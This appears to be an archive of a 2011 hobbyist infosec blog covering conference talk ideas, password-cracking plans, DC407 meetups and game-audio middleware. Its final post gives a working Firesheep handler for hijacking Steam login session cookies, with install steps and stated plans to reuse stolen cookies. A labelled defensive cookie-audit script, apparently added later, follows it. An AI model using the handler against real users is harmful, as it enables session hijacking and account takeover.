Shmoocon Submission and Current Events

Posted in projects on December 21st, 2011 by g3k

So it’s been a while since I’ve had a serious update to the blog.

Some of the things I’m working on I can’t quite talk about (work related), but I can go over some of the stuff I’m trying to accomplish.

Passwords: A conversation I had with @biosshadow on Twitter led me to have a series of conversations with him regarding something I’d like to work on, but currently can’t afford to. I have a lot of research to do with enacting it, but I’d like to start a commercial password cracking tool. The cost is currently very high. Bitcoin miners are taking over a lot of the really good hardware since it’s similar work involved. I’m hoping with the recent crashes of the BTC market, I’ll eventually be able to nab a few mining rigs or good Radeon cards. He’s started a similar project that I’ve outlined in the post below this one and we’re going to be working together on it. (working on details soonish)

I submitted a talk to Shmoocon about social engineering, it got rejected, but it makes me realize that I CAN and should submit talks to conferences. I had what I thought was a good topic (and a few people agreed with me): What the SE community can learn from pickup artists. If you are not familiar at all with pickup artistry, but you are familiar with social engineering, I encourage you to check it out. I’m going to outline it in a post sometime this week as I get more time, but the tl;dr is that pickup artists use their brand of social engineering to get laid. It’s more complicated than that and I will readily admit that I dove into that world for a while, but not for the reasons it’s regularly associated with. For one, it’s a confidence builder. Most people that know me or have known me are aware of the fact that I have had very little self confidence socially. Following exercises from this community, I’ve built up my self-confidence and have mostly eliminated my previous social anxiety. This all happened in less than a year. The goal of this talk is to highlight their community and support efforts, showcasing how quickly one can learn SE techniques from actively using pickup artist techniques. If you are familiar with the Star Wars universe at all, I was going to title it “The Dark Side of Social Engineering” based on the lore of the universe (quick path to power, etc), but expecting readers to pick that portion up from the title instead of seeing “The Evil Side of Social Engineering” is too much. I’m pretty nerdy.

The point of all that is that I’m planning on submitting this and possibly other talks in the future. It’s easier than it seems and it also seems like I have cool things to talk about, where previously I didn’t think I did.

If you have feedback on my talk idea, I’d love to hear it, drop a line in the comments or g3k AT disillusion dot us


PANIC Project

Posted in Uncategorized on December 21st, 2011 by g3k

Just wanted to show off a project a friend of mine is working on called the PANIC Project. Bioss and I started talking on Twitter regarding this project about 6 months ago, my interest being in building a service that cracks passwords and his being collecting data related to passwords, we decided to get together and talk about it. (Now, we haven’t had a chance to do that yet, but with him formally announcing his project, we’re going to be talking about it frequently ;) ) PANIC will scan “dump” or leak sites and look for real time password dumps to correlate data and find patterns.

Check it out at: https://biosshadow.com/2011/12/18/panic-project/ or https://groups.google.com/group/panic-project if you want to help out.

Plans.

Posted in projects, rebirth on October 7th, 2011 by g3k

So I’ve been taking a hard inward look of myself lately and it has led me to the conclusion that I am lacking in key areas. I asked a good friend of mine what he thought about this and he told me that I was a pussy, that my parents gave me a sense of entitlement and I’ve never really had to work hard for what I wanted. While this may seem harsh, it was exactly what I needed to hear and it’s true for the most part. If you look at my past and my present, I seem to have skated by somehow. I stumble into opportunities and I feel like I never really fully earn them.

So with this comes the initial self-doubt. “What am I doing in infosec?” “How did I manage to get here?” Then the realization that it’s time to man the fuck up.

So what comes from this?

Well, I see it as a time for growth. With everything that I’ve inadvertently done this past month to myself and possibly my career, it’s torn me and my ego down. Now it’s time to rebuild everything I thought I was into who I want to be.

I have a few projects I’ve been delaying because of whatever the hell reason. Now is the time to focus on them and get moving forward. I want to start from the beginning of my technical knowledge and fill the gaps. I feel like I have a great understanding in many things, but there are holes and gaps in my understanding that starting from the basics will help. I’ll probably post an outline of how I want to accomplish that once I’ve organized my thoughts.

Take a knee, spaceman.

Posted in Uncategorized on August 2nd, 2011 by g3k

There always comes a time where you need to step back, take a knee and do some science. The past month has been about nothing other than reaching back to the core of everything that builds me and hitting that place where for a moment I was my own personal god. I feel like getting the job I wanted for so long has gotten me into a bad place mentally, very complacent and not experimenting. So I took a knee.

Nerdapalooza breathed some light back into me. I hung out with Int 0x80 from Dual Core Music, listened to some new nerdcore artists I haven’t really had a chance to listen to and just kicked back. I met my personal hero, king of nerdcore and spam ytcracker. One of the coolest dudes I have ever had the chance of talking to. I’m flying out to hacker mecca tomorrow to hang with the community I once worshiped and am now a part of.

DC407 continues to grow. While our membership is still stagnant, I feel the quality of the membership is there and our presentations every month are getting really good. A lot of good things are growing from this group and I’m still excited to be a part of it. Speaking of which, here is the vulnerable PHP that was used in last week’s presentation: http://disillusion.us/dc407.tgz I’m looking forward to this year’s Defcon for the DCG meetup to get some others’ ideas on running Defcon Groups.

Anyways, wrapping up for now. I have a lot of stuff to do before I fly out tomorrow, especially getting product ready for my new tshirt company that I accidentally started with some friends.

edit: take a knee for mankind

DC407 June Links, Thoughts, etc

Posted in dc407 on June 27th, 2011 by g3k

DC407 for June went amazingly. I taught a quick primer on lockpicking and demonstrated how neat SET can be with a cred harvesting attack and tab nabbing attack. Since Abyss moved http://dc407.com over to WordPress hosting instead of on his server,  I no longer have access to update there for now.

Wanted to share some lockpicking links like I mentioned at the meeting on Friday:

http://locksport.com/index.php/discover-lockpicking/
http://www.schuylertowne.com/resources/
http://www.openlocksport.com/training.html
http://www.lockpicking101.com/

You can find SET (Social Engineering Toolkit) here: http://www.secmaniac.com/download/

The meeting went great, everyone got a chance to play with locks and learn how they work.  I’m glad everyone came out that did, if you want to talk about something next month or have feedback for previous meetings, please hit me up: g3k@disillusion.us

wut

Posted in dc407 on June 16th, 2011 by g3k

Damn.

I gotta say that I’ve been full of so much fail lately. I’ve had so much on my plate that I am having problems doing things I want to do. I’m basically being DDoSed by my own life. Screw that noise.

What’s on the table now? Not a whole lot, sadly. I don’t have a lot of time to work on projects lately, I’ve been traveling a lot and I just moved 3 hours south of where I was.  I’m struggling with finding something to do, that I can actually do. I have a lot of ideas I want to try, but my technical skill is low in these areas, so I’ll just have to build a framework to get there.

DC407 is going to be getting more active in the coming months. Now that I’m in Orlando, it should be easier to help out and make my way there. I was trying to participate and drive 3+ hours to get there. I have some fun ideas in my head, but I’m afraid of the group turning into a circle jerk. It’s the same people giving content every month, and it’s the similar things. A few ideas:

  • Metasploit workshops. Metasploit is still growing in popularity and maturing very fast, so much has changed since the last time we looked at it. Examine our current VM environment and add new machines as needed.
  • Lockpicking workshops. I bought a lot of locks from eBay and a few Chinese lockpicks from dealxtreme
  • Simple exploit development workshops. Writing exploits is relatively simple, but a lot of people think there is a lot of voodoo behind it. I want to make a simple educational framework to develop and write exploits, eventually moving beyond buffer overflows into some of the more advanced topics.

We’re struggling with membership. Like I mentioned earlier we have a few core members and it feels like a circlejerk sometimes. That’s not so terrible and I enjoy spending time with the same people, but I worry people may get bored and leave. I would really like to see this explode some more. 2010 we went nuts with this, let’s make this much better.


Exploration: FMOD

Posted in Audio, rebirth on April 24th, 2011 by faceman
This is a very simple example of an FMOD event

FMOD Middleware tool

I have been doing a lot of experimenting with middleware, such as FMOD. Middleware tools are tools that lay on top of a game engine and provide advanced functionality. The most common ones seen are for game audio, such as FMOD, WWISE, MILES AUDIO (HL2 runs a modified version of MILES), etc. While WWISE is undoubtedly the most advanced and crazy, FMOD is easy to work with and is free to download and play with (without a license you cannot integrate its functionality into a game, but you can design events and send them to someone with the license to implement). This picture demonstrates a simple example of a multi-tracked FMOD event that is mimicking a very basic function of a helicopter. In this example are 4 layers, the blades and three levels of wind speed. It is a very basic, and barely functional example but demonstrates some of the technical capabilities of FMOD. Where normally in a game engine such as UDK you have a basic, limited ability to mix audio based on distance in a perfect sphere shapable only by using reverb volumes; in a middleware tool such as FMOD you can control sound based on any self-set parameter you can think of. As long as your programmer can hook that parameter, you’re set! Now I know discussion of middleware might not be interesting to all of you, but I am sure there are a few of you whose interests are piqued. Besides, g3k already has all the infosec covered, I am just here to add more science!

If you want me to cover anything audio-related in particular, I will gladly do so if it is within my current or foreseeable knowledge. I am probably going to cover the UDK (unreal development kit), and when I have time, a more in-depth look at the advanced functionalities of FMOD (and or WWISE if I feel like it).

Today You, Tomorrow Me

|-_-| Faceman

Infosec Attention Deficit Disorder, or IS-ADD

Posted in Uncategorized on April 21st, 2011 by g3k

This post is going to deviate a little from the norm. I’m trying to focus more on learning new things, but I’m finding it difficult to learn one thing when there are a million other things out there to learn. I feel like I’m being pulled in 9001 different directions. It’s hard when you start out in this field to know what to do. You can say you want to be a pentester, but there is so much more than just being a pentester. You can specialize in other skills as well, reversing malware, finding bugs and writing exploits, forensics, network analysis, the list goes on. I’m generally a jack of trades, at least in IT I was, but I’m finding it hard to concentrate on learning one thing at a time. I’m overwhelmed with the vastness of things to learn.  I’m currently taking the Pentesting with Backtrack course from work,  I’m also running a honeypot project, reading about reversing malware and  I’m practicing my social engineering in the evenings when I go out. On top of all that, I’m learning PCI stuff for my day job.

What do you do to focus all this? I guess a thing I could do is write a list and prioritize what I want to learn and make goals. That’s what people do, right?  The hard part is making that decision, what do I want to learn? How do I want my career to progress? I feel like after I’ve gotten my first job in InfoSec (and in compliance) I’ve stagnated somehow, I feel like a new car that’s been driven off the lot; my value has gone down.

So my millions of readers, how would you combat this? Have you gone through something like this in the past? How did you fix it? Leave a comment, or fire me an email: g3k@disillusion.us

Willkommen schreib

Posted in 2011, rebirth on April 12th, 2011 by faceman

So it may be obvious there have been a few changes around here, but g3k also decided he needed someone to break up the monotony of his posts. Not saying he is monotonous, but he acknowledged that he wanted a farther reaching range of content. So he asked me to write for him, to not only maintain a constant influx of new posts for you to read, but to also break away from the usual content and delve deeper into the entity that is the internet and all of its appendages. Now, g3k is so far beyond me in InfoSec knowledge it isn’t even funny, but at the same time that is as far from my chosen career path as you can get and still use a computer regularly. However, I have the blessing of being in contact regularly with some rather interesting people, and this allows me to bring further insight to many topics. Now, my skills lie mostly in the audio field: studio recording, live sound, sound design etc. But my heart was originally in the computer, on the internet, floating amidst the cursing mountain dew guzzling jackasses that now comprise the professionals entering the InfoSec industry.

Until next time, when I can hopefully bring enlightening words to your rss feed,

|-_-| faceman


Firesheep and Steam

Posted in projects on April 6th, 2011 by g3k

I put together a quick Firesheep handler for a session cookie flaw that was disclosed here. It’s nothing crazy, or groundbreaking, but I figured I’d post it here and get credit where credit is due. It would blow if someone else found this from me posting it places and took credit.
I have a link to this on a pastie.org private paste, you can also view that instead if you like.

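// Firesheep handler definition for Steam
register({
  name: 'steam.com',                    // label shown in the Firesheep sidebar
  url: 'http://www.steampowered.com',   // page opened for a captured session
  domains: [ 'steampowered.com' ],      // hosts this handler applies to
  sessionCookieNames: [ 'steamLogin' ], // cookie that carries the login session
});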

Open up Notepad or whatever text editor you use, copypasta this and save as steam.js to the directory below in Windows

%appdata%\Mozilla\Firefox\Profiles\sgmeared.default\extensions\firesheep@codebutler.com\

I’m too lazy to look up the extension paths in other OSes, so you’re just going to have to do a little work.

I’m going to be looking into how the Steam client handles cookie data this week, I’m pretty sure I can steal a session cookie and use it in the client itself to download whatever. I’ll have to see how it works first :)
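A defender's view of the same handler, added here as an example (not code from the original post or from Firesheep): it takes the handler's sessionCookieNames and reports which of those cookies a site sets without the Secure attribute, meaning the browser will also send them over plain HTTP where they can be read off the wire. The function names and the Set-Cookie lines are constructed for illustration.

```javascript
// Added example: defender-side audit, not code from the post or from Firesheep.
// Same fields as the handler in the post; only sessionCookieNames is used here.
const handler = {
  name: 'steam.com',
  domains: ['steampowered.com'],
  sessionCookieNames: ['steamLogin'],
};

// Parse one Set-Cookie header value into { name, attrs }.
// Attribute names are case-insensitive; flag attributes map to true.
function parseSetCookie(header) {
  const parts = header.split(';').map((p) => p.trim()).filter(Boolean);
  const eq = parts[0].indexOf('=');
  const name = eq === -1 ? parts[0] : parts[0].slice(0, eq);
  const attrs = {};
  for (const p of parts.slice(1)) {
    const i = p.indexOf('=');
    const key = (i === -1 ? p : p.slice(0, i)).trim().toLowerCase();
    attrs[key] = i === -1 ? true : p.slice(i + 1).trim();
  }
  return { name, attrs };
}

// Names of handler-targeted cookies set without Secure, i.e. cookies the
// browser will attach to plain-HTTP requests as well as HTTPS ones.
function cookiesSentInCleartext(handler, setCookieHeaders) {
  const exposed = [];
  for (const h of setCookieHeaders) {
    const { name, attrs } = parseSetCookie(h);
    if (handler.sessionCookieNames.includes(name) && !('secure' in attrs)) {
      exposed.push(name);
    }
  }
  return exposed;
}

// Constructed sample responses (values are placeholders, not real cookies).
const weakHeaders = [
  'steamLogin=PLACEHOLDER; Path=/; Domain=steampowered.com',
  'lang=en; Path=/',
];
const hardenedHeaders = [
  'steamLogin=PLACEHOLDER; Path=/; secure; HttpOnly',
];

console.log(cookiesSentInCleartext(handler, weakHeaders));     // [ 'steamLogin' ]
console.log(cookiesSentInCleartext(handler, hardenedHeaders)); // []
```

Secure only stops the browser from attaching the cookie to HTTP requests; the site still has to serve every authenticated page over HTTPS for the session to stay off the wire.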
